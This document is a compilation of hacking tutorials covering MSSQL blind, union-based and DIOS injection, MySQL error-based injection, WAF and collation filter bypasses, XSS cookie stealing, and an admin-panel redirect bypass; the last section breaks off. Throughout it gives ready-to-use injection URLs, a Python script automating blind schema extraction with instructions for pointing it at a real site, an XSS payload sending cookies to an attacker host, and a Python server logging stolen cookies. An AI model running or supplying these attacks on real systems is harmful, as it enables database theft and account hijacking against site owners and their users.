Mssql Blind Sql Injection Tutorial Step By Step !


In this tutorial you will learn how to perform and exploit blind MSSQL SQL injection manually, step by step.

What is Blind Mssql SQL Injection ?

Blind SQL (Structured Query Language) injection is a type of SQL injection attack that asks the database true-or-false questions and infers the answer from the application's response. It is the technique of choice when the web application is configured to show only generic error messages but still runs the vulnerable, user-controlled query unfixed.

In some cases a normal (UNION- or error-based) injection does not work; blind SQL injection is the method that may still help you. The important point for blind injection is the difference between the response to a valid (true) query and the response to an invalid (false) one: you inject a statement that makes the query true or false and observe how the response changes.

How To Test Mssql Blind SQL Injection Vulnerable Sites ?

Let us assume that http://www.example.com/page.asp?id=1 is a normal URL of the website. We check the vulnerability of the website with always-true and always-false conditions such as 1=1, 1=2 or 0>1:

http://www.example.com/page.asp?id=1 and 1=1  (True)
http://www.example.com/page.asp?id=1 and 1=2  (False)
http://www.example.com/page.asp?id=1 and 0>1  (False)

If the responses to these requests differ, that is a good signal: the website is very likely vulnerable to blind MSSQL injection. With "id=1 and 1=1" the condition is true, so the response must be the normal page. With "id=1 and 1=2" the condition is false, and if the webmaster does not filter the parameter properly the response differs from the previous one (typically an empty page or a missing record). Compare the true case with the plain request (id=1) and the false case with an obviously missing record (id=99999) before you trust the signal, so that a page that merely changes between loads (dates, adverts, counters) does not fool you.

Extracting data through Blind Mssql SQL Injection

With blind MSSQL injection you can extract the whole database, but it costs many requests: each query answers only one yes/no question, so you need several queries to obtain a single character.

Let me explain with an example: querying the first character of the database name. We assume that the database name is member, so the first character is "m", whose ASCII value is 109. (At this point we assume that you know the ASCII table.)

First, remember that the responses to our requests have only two forms: the valid (true) one and the invalid (false) one.

The order in which you test ASCII values is up to you; your idea may differ from ours. Narrowing the range by halving it each time (a binary search over 0-127) takes the fewest requests, as the example below shows.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

In this situation the result is the valid response, the same as for http://www.example.com/page.asp?id=1 and 1=1, because the first character of the database name is "m" (ASCII 109, which is greater than 90). Then we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120

This time the result is surely the invalid response, the same as for http://www.example.com/page.asp?id=1 and 1=2, because 109 is not greater than 120.
Then we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105

The result is the valid response, so at this point the ASCII value of the first character of the database name is greater than 105 and not greater than 120.
So we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>112 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108 ===> valid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>109 ===> invalid query result

You see that the first character of the database name has an ASCII value that is greater than 108 but not greater than 109. Thus we can conclude that the ASCII value is exactly 109.

You can prove with:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109

We are sure that the result is the same as the result of http://www.example.com/page.asp?id=1 and 1=1. For the second character change the second argument of SUBSTRING from 1 to 2 and repeat the search. Note the ISNULL(...,0) in the query: once the position is past the end of the string, SUBSTRING returns an empty string, ASCII() of it is NULL, and ISNULL turns that into 0, so a character that is "not greater than 0" tells you the name has ended.

The rest is a matter of changing the inner query to collect the information you want.
In this tutorial we propose some example queries for finding the names of the tables and columns in the database.

Extracting table names through Blind Mssql SQL Injection

To get a table name we use the method above to obtain each character of it. The only thing we have to change is the inner query, which must now return a table name of the current database. MSSQL has no LIMIT clause (SQL Server 2012 and later have OFFSET ... FETCH, but TOP works on every version), so the query uses TOP and a NOT IN subquery to skip names and is therefore a bit more complicated.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)>97

The above query returns the first character of a user table name (xtype=0x55 is 'U', a user table). Read it carefully: the outer SELECT TOP 1 takes the first name that is NOT IN the first TOP 1 names, so it returns the second table, not the first. To get the first table use TOP 0 in the inner SELECT (or drop the NOT IN altogether). Also, TOP without ORDER BY returns rows in an order that is unspecified but in practice stable; add ORDER BY name to both SELECTs if you want the enumeration to be deterministic. If we want the second character of that table name, we send the following request:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),2,1)),0)>97

We changed the second argument of the SUBSTRING function from 1 to 2 to specify the position of the character in the table name.
So, to determine other positions, we only need to change the second argument of the SUBSTRING function.

For other tables we change the inner select from "SELECT TOP 1" to "SELECT TOP 2", "SELECT TOP 3" and so on: TOP n in the inner query skips the first n names, so the outer query returns the (n+1)th table. For example, the third table:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)=97

Extracting column names through Blind Mssql SQL Injection

After we obtain the table names, the next target is of course the column names.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97

To get around quote filtering (PHP's magic quotes, or any filter that escapes or strips the single quote), write 'tablename' as a concatenation of char() calls instead. For example, if the table name is 'user' and we put 'user' in the query, the ' may be filtered and our query breaks. The solution is to convert 'user' to char(117)+char(115)+char(101)+char(114), so the WHERE clause changes from "WHERE name='user'" to "WHERE name=char(117)+char(115)+char(101)+char(114)".

In this way we circumvent the quote filtering. The result of the above request is the first character of the first column name of the chosen table.
To find the second character of the first column we use the same method as for table names: change the second argument of the SUBSTRING function.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97

The above request determines the second character of the first column name in the chosen table.
For other columns change the p.x value from 1 to 2, 3, 4 and so on (p.x is the column's ordinal position, computed by the COUNT subquery over syscolumns), such as

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)>97

The above request determines the first character of the second column name in the chosen table.
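As an added example (this is not code from the original tutorial), the following Python script automates everything described above, from the character-by-character binary search to the table and column enumeration: it builds the ISNULL(ASCII(SUBSTRING(...))) condition, halves the ASCII range on every request until one value is left, stops when ISNULL yields 0, encodes table names with char() as described for the column query, and walks database name, tables and columns in turn. There is no real target here: fake_oracle, FAKE_CATALOGUE and the table and column names in it are constructed stand-ins for the server's true/false response, and the ORDER BY name in table_subquery is an addition the tutorial's queries do not have. To use it against a real page, replace fake_oracle with a function that requests id=1 plus the condition and returns whether the response is the "true" page.

```python
import re
from typing import Callable, Dict, List

# Boolean template from the tutorial; the condition is appended to "id=1".
# ISNULL(...,0) turns the NULL that ASCII() returns past the end of the string
# into 0, which is how extract() detects the end of a name.
TEMPLATE = ("1 AND ISNULL(ASCII(SUBSTRING(CAST(({sub}) AS varchar(8000)),"
            "{pos},1)),0){op}{n}")


def mssql_char(s: str) -> str:
    """Quote-free string literal: 'user' -> char(117)+char(115)+char(101)+char(114)."""
    return "+".join(f"char({ord(c)})" for c in s)


def db_name_subquery() -> str:
    return "SELECT LOWER(db_name())"


def table_subquery(n: int) -> str:
    """n-th user table (1-based): TOP n-1 in the inner SELECT skips the first n-1 names.
    ORDER BY name is added here (the tutorial omits it) so the order is deterministic."""
    return ("SELECT TOP 1 LOWER(name) FROM sysobjects WHERE xtype=0x55 AND name NOT IN "
            f"(SELECT TOP {n - 1} name FROM sysobjects WHERE xtype=0x55 ORDER BY name) "
            "ORDER BY name")


def column_subquery(table: str, n: int) -> str:
    """n-th column of `table`; the table name goes in as char() so no quote is needed."""
    t = mssql_char(table)
    return ("SELECT p.name FROM (SELECT (SELECT COUNT(i.colid) FROM syscolumns i "
            f"WHERE i.colid<=o.colid AND i.id=(SELECT id FROM sysobjects WHERE name={t})) x,"
            f"name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name={t})) p "
            f"WHERE p.x={n}")


def extract(oracle: Callable[[str], bool], sub: str, max_len: int = 64) -> str:
    """Recover the string returned by `sub` one character at a time with a binary
    search over ASCII 0..127: exactly 7 true/false requests per character."""
    out: List[str] = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:                      # invariant: lo <= code <= hi
            mid = (lo + hi) // 2
            if oracle(TEMPLATE.format(sub=sub, pos=pos, op=">", n=mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                         # ISNULL gave 0: past the end of the string
            break
        out.append(chr(lo))
    return "".join(out)


def enumerate_schema(oracle: Callable[[str], bool]) -> Dict[str, object]:
    """Database name, every user table and every column, using only the oracle."""
    tables: Dict[str, List[str]] = {}
    n = 1
    while True:
        t = extract(oracle, table_subquery(n))
        if not t:
            break
        cols: List[str] = []
        while True:
            c = extract(oracle, column_subquery(t, len(cols) + 1))
            if not c:
                break
            cols.append(c)
        tables[t] = cols
        n += 1
    return {"db": extract(oracle, db_name_subquery()), "tables": tables}


# Constructed stand-in for the target: answers the injected condition from a fake catalogue.
FAKE_CATALOGUE = {
    db_name_subquery(): "member",
    table_subquery(1): "admin",
    table_subquery(2): "users",
    column_subquery("admin", 1): "id",
    column_subquery("admin", 2): "pass",
    column_subquery("users", 1): "id",
    column_subquery("users", 2): "username",
}
_PAT = re.compile(r"CAST\(\((.*)\) AS varchar\(8000\)\),(\d+),1\)\),0\)([>=])(\d+)$")


def fake_oracle(condition: str) -> bool:
    """True when a real server would return the normal page for id=1 plus `condition`."""
    m = _PAT.search(condition)
    sub, pos, op, n = m.group(1), int(m.group(2)), m.group(3), int(m.group(4))
    value = FAKE_CATALOGUE.get(sub, "")
    code = ord(value[pos - 1]) if pos <= len(value) else 0   # ISNULL(ASCII(NULL),0) -> 0
    return code > n if op == ">" else code == n


if __name__ == "__main__":
    print(enumerate_schema(fake_oracle))
```

Seven requests per character is the floor for a 7-bit alphabet with a yes/no oracle; the loop above also spends one extra request block per name to discover its end, which is what the ISNULL(...,0) trick in the original queries buys you.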

 

Cookie Stealing From Cross Site Scripting ( xss ) Attack


Hello guys, in this post I will show you cookie stealing through a cross-site scripting (XSS) attack: how an attacker can steal cookies from users. I hope you are familiar with XSS; if not, please read our basic XSS tutorial first.

Pre-requisite :

  • A cookie stealer script (PHP).
  • Free web hosting (or any server you control).
  • Basic knowledge of XSS attacks.

Cookie stealing is the process in which an attacker exploits an XSS vulnerability to steal the cookies of every victim who visits the infected page or link. With the session cookie the attacker can then take over the victim's account. One caveat: a cookie flagged HttpOnly is invisible to document.cookie, so this attack only captures cookies the application left readable to scripts.

Creating PHP Cookie Stealer

 

  • Copy the cookie stealer code.
  • Open Notepad or any editor and paste the code.
  • Save the file with a .php extension, e.g. xss.php.

Now create a new, empty file and save it as log.txt. Do not change the name: it is the file name used inside the PHP file.
Now we have two files: 1) xss.php
                       2) log.txt

Hosting Cookie Stealer and Log file

Now we have to host both files. You can use free web hosting, or expose a machine you control through a tunnel. Once hosted, the stealer is at www.domain.com/xss.php.


Now everything is set up; we have to find a vulnerable website in which to inject our malicious code:

<script>location.href = 'http://www.site.com/xss.php?cookie='+document.cookie;</script>

Cookie Stealing with Stored vs Reflected XSS:

Stored: if you inject this code into a site with a persistent XSS vulnerability, it stays there until the admin finds it and is served to every user, so the attacker does not need to send anyone a link. Whoever visits the page becomes a victim.

Reflected: with a non-persistent vulnerability the attacker has to send the link to the victims; whenever they follow it, the script steals their cookie. Reflected XSS is the more common of the two.

In the reflected case the attacker sends the injected link to the victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above link clearly shows the script. The attacker can URL-encode the script and shorten the link with a URL-shortening service such as TinyURL before sending it to the victim:

http://www.Site.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Once the victim opens the link, his/her cookie is written to the log.txt file.
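As an added example, not the original post's PHP stealer, here is the same setup in Python: build_payload reproduces the injected script, encode_all produces the fully percent-encoded link shown above, and CookieCatcher plays the role of xss.php, appending each stolen cookie to log.txt. The host names (www.Yoursite.com, www.VulnerableSite.com) and port 8080 are placeholders.

```python
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

LOG_PATH = "log.txt"   # same file name the tutorial uses


def build_payload(stealer_url: str) -> str:
    """The injected script from the tutorial, pointed at our catcher."""
    return f"<script>location.href = '{stealer_url}?cookie='+document.cookie;</script>"


def encode_all(s: str) -> str:
    """Percent-encode every byte (what the encoded link above does), not just reserved ones."""
    return "".join(f"%{b:02x}" for b in s.encode("utf-8"))


def reflected_link(vuln_url: str, param: str, stealer_url: str) -> str:
    """Link to send to the victim: vulnerable page + parameter + encoded payload."""
    return f"{vuln_url}?{param}={encode_all(build_payload(stealer_url))}"


def cookie_from_request(path: str):
    """Value of ?cookie=... in the request the victim's browser makes to the catcher, or None."""
    query = urllib.parse.urlparse(path).query
    values = urllib.parse.parse_qs(query).get("cookie")
    return values[0] if values else None


class CookieCatcher(BaseHTTPRequestHandler):
    """Stand-in for xss.php: append the stolen cookie to log.txt, answer with an empty page."""

    def do_GET(self):
        cookie = cookie_from_request(self.path)
        if cookie is not None:
            with open(LOG_PATH, "a", encoding="utf-8") as log:
                log.write(f"{self.client_address[0]}\t{cookie}\n")
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):   # keep stdout quiet; log.txt is the record
        pass


if __name__ == "__main__":
    print(reflected_link("http://www.VulnerableSite.com/index.php", "search",
                         "http://www.Yoursite.com/Stealer.php"))
    HTTPServer(("0.0.0.0", 8080), CookieCatcher).serve_forever()
```

The catcher must be reachable from the victim's browser, which is why the tutorial hosts it publicly. Because document.cookie cannot read HttpOnly cookies, a site that sets that flag on its session cookie will produce log lines without the session value; that is the first thing to check before blaming the hosting.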

 

MSSQL Union Based Injection Step By Step


Today I am going to show you MSSQL union-based injection step by step. In this post I will only cover the basics. I don't see a lot of detailed tutorials on the Internet, so I am going to do what I can to help out based on my experience with MS SQL injections. First of all we need to know the basics of injecting: finding the type of injection, testing the database and finding the columns are the same as for other databases, so I suggest you read the basics before you start here if you have not read them yet.

So, let's start.

  • The checking part is the same as for MySQL: first put a single quote, then a double quote, and check the error. Both gave an error here, which told me this one is an integer-based injection.
www.site.com/?id=1%27 [ Error ]
www.site.com/?id=1%22 [ Error ]

Remember: when both the single quote and the double quote give an error, there is a high probability that the injection is integer-based. With a single-quote-based injection the double quote gives no error, and with a double-quote-based injection the single quote gives no error; when both give an error, apply the golden rule that the injection is integer-based.

  • Now let's break and fix the query:
    www.site.com/?id=1 -- - [ Working Fine ]
    www.site.com/?id=1 order by 5-- - [ Working Fine ]
    www.site.com/?id=1 order by 6-- - [ Error ]

    That means the total number of columns is 5.

  • Continue with ORDER BY until you find the last working column (5 here). The next part is the UNION SELECT query; note that MSSQL has no boolean literal false, so the original row is suppressed with and 1=2:
www.site.com/?id=1 and 1=2 UnIoN SeLeCt 1,2,3,4,5-- -
[screenshot: the error returned by this UNION SELECT request]

If you get an error here (usually a type-conversion error, because every column of a UNION must have a compatible type), use NULL instead, which matches any type:

www.site.com/?id=1 and 1=2 UnIoN SeLeCt null,null,null,null,null-- -
  • Now replace the NULLs one by one with @@version or db_name(); the column that echoes the value is the one you can read data through (the video shows how I did it).
  • When you put @@version in a vulnerable column, the page shows the version, something like this:
    [screenshot: the page displaying the output of @@version]

There are some other ways also to collect some more information from MSSQL which are given here:

  1. @@version – Gives version
  2. db_name() – Gives the name of the current database
  3. user,system_user,current_user,user_name – Gives the current user.
  4. @@SERVERNAME – Gives the hostname of the server.
  • Now we extract the table names. The syntax is a little different from MySQL because MSSQL has no LIMIT clause: the derived table takes the first n names in ascending order, and the outer ORDER BY 2 DESC (column 2 is where table_name lands) puts the n-th one first, so increasing n walks through the tables one at a time:
http://site.com/?id=1 and 1=2 Union All Select 1,table_name,3,db_name(),5 from (select top 1 table_name from information_schema.tables order by 1) as t order by 2 desc--
http://site.com/?id=1 and 1=2 Union All Select 1,table_name,3,db_name(),5 from (select top 2 table_name from information_schema.tables order by 1) as t order by 2 desc--
http://site.com/?id=1 and 1=2 Union All Select 1,table_name,3,db_name(),5 from (select top 3 table_name from information_schema.tables order by 1) as t order by 2 desc--
  • Increase the TOP value in this way. (In the video I only showed DIOS-ing the site.)
  • In the same manner we can extract the column names. Let's see:
http://site.com/?id=1 and 1=2 Union All Select 1,column_name,3,db_name(),5 from (select top 1 column_name from information_schema.columns where table_name='your table name here' order by 1) as t order by 2 desc--
http://site.com/?id=1 and 1=2 Union All Select 1,column_name,3,db_name(),5 from (select top 2 column_name from information_schema.columns where table_name='your table name here' order by 1) as t order by 2 desc--
  • Now let's dump the data from the tables and columns. For concatenation we use +, which has to be URL-encoded as %2b:
http://site.com/?id=1 and 1=2 Union All Select 1,username%2b' '%2bpassword,3,db_name(),5 from [your table name here]--

Now we have almost finished. Let's come to the DIOS part.

This DIOS (dump in one shot) was created by my friends Zen and Rummy. By DIOS-ing the site we make the whole process faster: one stacked batch walks INFORMATION_SCHEMA, concatenates every table name with its column names into a single string and stores that string in a new table, which you then read back with a single request. It needs stacked queries to be allowed and the right to create a table.

How to DIOS the MSSQL site:

DIOS (shown on several lines for readability; in the URL it goes on one line and every + must be sent as %2b, as in the request below; CHAR(60)+CHAR(98)+CHAR(114)+CHAR(62) is simply <br>; widen @a if a table has many columns, since the column list is silently truncated to its size)

;begin
 declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100)
 declare @myTbl table (name varchar(8000) not null)
 SET @y=1
 SET @x='Injected by Ahmed :: '+@@version+CHAR(60)+CHAR(98)+CHAR(114)+CHAR(62)+'Database : '+db_name()+CHAR(60)+CHAR(98)+CHAR(114)+CHAR(62)
 SET @z=''
 SET @a=''
 WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES)
 begin
  SET @a=''
  Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl)
  select @a=@a+column_name+' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z
  insert @myTbl values(@z)
  SET @x=@x+CHAR(60)+CHAR(98)+CHAR(114)+CHAR(62)+'Table: '+@z+CHAR(60)+CHAR(98)+CHAR(114)+CHAR(62)+'Columns : '+@a+CHAR(60)+CHAR(98)+CHAR(114)+CHAR(62)
  SET @y=@y+1
 end
 select @x as output into Ahmed1
END--

  • Remove the UNION SELECT, fix the query, then append the DIOS and execute it as shown below (for more details see the video):
http://site.com/?id=1;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--
  • It will give an error (the stacked batch returns nothing for the page to display), but it has actually created the DIOS table, so now let's read the output column of Ahmed1 back through the UNION SELECT from before.

[screenshot: the DIOS output read from the Ahmed1 table]

  • And here we get the complete output at once. Before I finish I would like to show you some basic errors in MSSQLi.

So here we finish MSSQL Union Based Injection. Keep practicing and learning guys..

Error Based sql Injection Step by Step


After union-based SQL injection I am going to cover error-based SQL injection. Sometimes we find the number of columns, but the UNION statement gives an error such as "The used SELECT statements have a different number of columns", and brute-forcing the column count does not work either. Such websites are injected with error-based (double query) injection, which makes MySQL report the value we want inside an error message.

So let's come to work.

  1. The first step is to get the version. Here is the error-based query for it:
www.vuln-web.com/?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 -- -

2. The second step is to enumerate the database of the website: use the above query and replace version() with database(). Another syntax used to enumerate the database is:

www.vuln-web.com/?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

Note that this query always reports the current database: DATABASE() returns the same value for every row, so changing the LIMIT only picks a different row of the same result. If the user can see more than one database, select schema_name FROM INFORMATION_SCHEMA.SCHEMATA instead of DATABASE() and step through them with
Limit 0,1
Limit 1,1
Limit 2,1

In this way you can get all the databases of the website.

3. The third step is to enumerate the table names of the target:

www.vuln-web.com/?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -

Using this query you get one table name. To get all the table names, just increase the LIMIT offset as shown above.

4. The fourth step is to enumerate the columns. Say we found the table users; we enumerate the columns of that table:

www.vuln-web.com/?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

Note: replace table_name=0x7573657273 (the hex encoding of 'users', which avoids quotes) with your desired table name converted to hex.

5. The fifth step is to dump data from the columns. Suppose the column names are username and password; we dump them from the table users:

www.vuln-web.com/?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,0x3a,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

Here 0x3a is the hex value of ':', used as a separator between username and password, so the result looks like this:
username : password
Without the separator you cannot tell where one value ends and the other begins, because the result would look like this:
usernamepassword

Here,
users = table name
username = first column
password = second column

Replace these with your desired table name and column names.

Thanks for reading guys, keep practising and learning 🙂

Bypass illegal mix of collations in sql injection


In this post you will learn how you can bypass the error illegal mix of collations in sql injection.

What is an illegal mix of collations?

Collation refers to a set of rules that determine how data is sorted and compared. Character data is sorted using rules that define the correct character sequence, with options for specifying case-sensitivity, accent marks, character types and character width.

Collation is concerned with how character data is interpreted and compared by MySQL. Because many people store data in languages other than English, they need to select comparison rules, which in turn depend on the character set used for storing that data.

In MySQL, data is stored using a specific character set, which can be defined at different levels: the server, the database, the table and the column.

With UNION SELECT we combine the result sets of two or more SELECT statements. We already know that each SELECT within the UNION must have the same number of columns and that the columns must have compatible data types. Their collations must be compatible too; if they are not, MySQL raises the error "Illegal mix of collations".

Bypassing Error

# Method 1

Define the collation explicitly on the expression with COLLATE, for example:
SELECT * FROM table ORDER BY somekey COLLATE latin1_general_ci;

We can use different collation names:
latin1_general_ci
utf8_general_ci
utf8_unicode_ci
latin1_german1_ci
latin1_swedish_ci

A name ending in _ci indicates a case-insensitive collation.
A name ending in _cs indicates a case-sensitive collation.
A name ending in _bin indicates a binary collation. Character comparisons are based on character binary code values

# Method 2

Use the function CONVERT().
CONVERT() provides a way to convert data between different character sets. The syntax is CONVERT(expr USING transcoding_name).
http://vuln-web.com/?id=1 and 0 UNION SELECT 1,convert(version() using binary),3,4,5,6,7,8--

# Method 3

Use function CAST

You can also use CAST() to convert a string to a different character set. The syntax is CAST(character_string AS character_data_type CHARACTER SET charset_name); casting to BINARY also works:

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,cast(version()as binary),3,4,5,6,7,8--

# Method 4

Use UNHEX(HEX(xx)):
HEX() –> returns the hexadecimal representation of a string (or number)
UNHEX() –> interprets each pair of hex digits as a byte and returns the resulting binary string, which has the binary collation and therefore cannot conflict with anything

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,UNHEX(HEX(version())),3,4,5,6,7,8--

I hope this helps you with the illegal mix of collations error. Keep learning and practising.

Thanks for reading guys. 🙂

Sql Injection – Inject A Site When Commas Are Blocked


In this tutorial I will show you how to inject a site when commas are blocked.

There are many methods to get a comma past the filter, or to avoid needing one at all.

# Method 1

Put the comma inside a MySQL version comment, /*!...*/, whose contents MySQL still executes while a naive filter sees only a comment:

union select 1/*!,*/ 2/*!,*/ 3

Note that a plain comment does not work the same way: MySQL strips /*,*/ entirely, so

union select 1/*,*/ 2/*,*/ 3

is executed as union select 1 2 3, which is a syntax error.

# Method 2

CHAR(44) is the comma character (44 is its ASCII value). It gives you a comma as data, for example as a separator in concatenated output when the WAF strips literal commas from the response, but it cannot stand in for the commas that separate the columns of the SELECT list; those still have to be real commas (or hidden with one of the other methods):

union select 1,CHAR(44),2,CHAR(44),3

# Method 3

Use JOIN: each derived table supplies one column and the join yields a single row, so no comma is needed anywhere:

union select * from ((select 1)a join (select 2)b join (select 3)c)

# Method 4

Escaped encoding, URL encoding or percent-encoding is a method of representing characters within a URL that need special syntax handling to be interpreted correctly. The character is encoded as a sequence of three characters: the percent sign % followed by the two hexadecimal digits of the character's octet code. For example, the US-ASCII character set represents a comma with octet code 44, hexadecimal 2C, so its URL-encoded representation is %2C. This only helps when the filter inspects the raw request while the web server decodes it before handing it to the application; the database itself never sees %2C.

union select 1%2C 2%2C 3

# Method 5

Some posts suggest replacing the comma with %82:

union select 1%82 2%82 3

Byte 0x82 is not a comma in ASCII, Latin-1 or UTF-8, and MySQL will not parse it as a list separator, so do not rely on this one.

# Method 6

Sometimes the basic URL-encoding trick does not work, but you can still get past the WAF by double-URL-encoding the blocked character: the % of the encoded comma is itself URL-encoded (as %25), so the double-encoded comma %2C becomes %252C. This works when the WAF decodes once and the application decodes a second time.

union select 1%252C 2%252C 3

Thanks for reading guys. My next tutorial will be on bypassing whitespace filters. Keep sharing and learning 🙂

Bypass The Admin Panel Using No Redirection


In this post I will show you how you can bypass an admin panel using a no-redirect add-on. A surprising number of websites can be bypassed this way.

Pre-requisite:

  • Mozilla Firefox
  • No redirect Addon
  • Brain 😉

What an attacker can do ?

  • An attacker can bypass the login and reach the admin panel using this add-on.
  • An attacker can make changes in site.
  • An attacker can shell the site.

so lets come to work..

  • Download and install the NoRedirect add-on for Firefox.
  • Open the admin panel of targeted website.

For example: http://vuln-web.com/admin/index.php

  • Now we guess the file names in the admin folder so that we can request a page directly. If you cannot guess them, spider the whole site and try each page you find:
http://vuln-web.com/admin/index.php        (same Login Page)
http://vuln-web.com/admin/login.php        (Error, Page Not Found)
http://vuln-web.com/admin/home.php         (Error, Page Not Found)
http://vuln-web.com/admin/welcome.php      (Error, Page Not Found)
